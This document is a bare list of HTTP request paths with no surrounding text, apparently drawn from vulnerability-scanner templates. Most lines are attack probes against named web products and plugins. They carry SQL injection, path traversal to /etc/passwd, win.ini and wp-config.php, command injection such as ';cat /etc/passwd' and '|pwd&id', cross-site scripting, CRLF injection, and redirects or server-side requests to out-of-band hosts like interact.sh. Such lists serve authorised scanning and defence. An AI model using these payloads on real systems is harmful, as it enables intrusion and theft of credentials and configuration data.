/?id={{str}}%25{128*128}
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/secure/ContactAdministrators!default.jspa
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/free_time.cgi
/cgi-bin/kerbynet?Action=StartSessionSubmit&User=
/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29
/password.jsn
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-json/visualizer/v1/upload-data
/pages/systemcall.php?command=cat%20/etc/passwd
/getcfg.php
/{{interface}}
/getFavicon?host=oast.fun?
/vpn/../vpns/cfg/smb.conf
/query?db=db&q=SHOW%20DATABASES
/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php
/cgi-bin/file_transfer.cgi
/objects/getImage.php?base64Url={{base64(encode)}}=&format=png
/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg
/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg
/objects/{{filename}}.txt
/api/timelion/run
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/api/filemanager?path=%2F..%2f..%2fContent
/debug/pprof/
/debug/pprof/goroutine?debug=1
/LetsEncrypt/Index?fileName=/etc/passwd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/admin
/backend
/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini
/base/static/c:/windows/win.ini
/api/snapshots

/wp-login.php?SECUPRESSaction=confirmaction
/wp-content/plugins/insert-php/readme.txt
/catalog.php?filename=../../../../../../../../../etc/passwd
/action/usermanager.htm
/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d
/cgi-bin/config.exp
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin
/api-third-party/download/extdisks../etc/passwd
/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd
/../../../../../../etc/passwd
/config.dat
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/../../../../../etc/passwd
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/CDGServer3/ClientAjax
/.%00./.%00./etc/passwd
/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd
/umweb/../etc/passwd
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/%5cgoogle.com/evil.html
/http%3A%2F%2Fwww.interact.sh
/modules/babel/redirect.php?newurl=http://interact.sh
/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E
/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>
/mobile/index.php
/share/page/dologin
/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/nd-booking/readme.txt
/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
/api/users
/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/osm/REGISTER.cmd
/osm_tiles/REGISTER.cmd
/?static=1&order=asc
/plugins/search/..\..\..\conf\openfire.xml
/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)
/_syslog.txt
/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/Login?!
/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C
/wp-admin/admin.php?page=download_report&report=users&status=all
/data/autosuggest-remote.php?q=
/admin/data/autosuggest-remote.php?q=
/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/secure/ManageFilters.jspa?filter=popular&filterView=popular
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
/rest/api/2/user/picker?query=
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL
/labkey/__r1/login-login.view?returnUrl=http://interact.sh
/masthead/masthead.axfm
/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands
/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E
/%0d%0aSet-Cookie:crlfinjection=1;
/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/updating.jsp?url=https://interact.sh/
/kindeditor/php/demo.php
/php/demo.php
/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
/plugins/servlet/gadgets/makeRequest
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/hoteldruid/visualizza_tabelle.php?nsextt=x
/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13
/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php
/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019
/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php
/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d
/?p={{post_id}}&0=type+C:\\windows\\win.ini
/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/wp-admin/admin.php/
/?mp_idx=%22;alert(%271%27);//
/html/common/forward_jsp.jsp?FORWARD_URL=http://oast.me%EF%BF%BD@localhost
